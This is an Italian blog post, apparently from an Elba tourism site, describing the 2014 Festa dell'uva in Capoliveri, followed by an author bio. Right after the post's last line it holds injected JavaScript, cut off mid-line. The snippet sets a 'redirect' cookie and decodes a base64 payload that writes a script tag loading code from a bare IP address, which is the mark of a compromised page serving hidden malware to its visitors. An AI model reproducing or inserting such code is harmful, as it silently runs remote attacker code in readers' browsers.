Festa dell’uva 2014

Che dire ?! Anche questa  Festa dell’uva è stata sorprendente. Anno dopo anno l’allegria, la gioia, la cura che l’intero paese mette nel preparare questo avvenimento  lo rendono  uno tra i più attesi dell’autunno elbano.

19 edizioni ma  lo stesso entusiasmo della prima volta, Capoliveri riesce a sorprenderti  ogni  anno. Ti trascina con la  sua  la musica e i suoi colori.  Ti porta dentro quelle  scene d’altri tempi , immergendoti in un’atmosfera di giubilio e allegria.

Quello che colpisce di più è la passione dei partecipanti che donano  un po’ di loro stessi, del loro buonumore e del loro saper fare.  Ed è questo che  secondo me che la fa differenza.  La cura nel preparare ogni dettaglio:  l’uva e la paglia per le strade, gli ombrelli colorati, l’impasto per il pane fresco e i frati caldi.

Nulla viene lasciato al caso: i copricapo, i colletti delle camice rigorosamente “come andavano una volta”, i bambini vestiti a festa.

Parlando con chi ha partecipato attivamente all’evento , preparando le vie, allestendo i banchi o recitando come figurante  scopro che in realtà  il sentimento più sentito non è la competetizione tra i rioni, come si potrebbe erroneamente pensare.

Ciò che più anima queste persone è lo spirito di gruppo e la collaborazione per condividere poi l’eventuale vincita.

La cordialità, la gentilezza e il mettere tutti a proprio agio sono gli intenti più sentiti  dai Capoliveresi, che invitano  tutti a partecipare alla festa, lasciando spazio anche agli altri e facendoli sentire un po’ come una grande famiglia. L’impegno e la passione guidano tutti i rioni.  per questo l’allegria e la collaborazione sono assicurate! Quindi #elbauva arriverderci al prossimo anno! _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Vedi tutti gli eventi

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento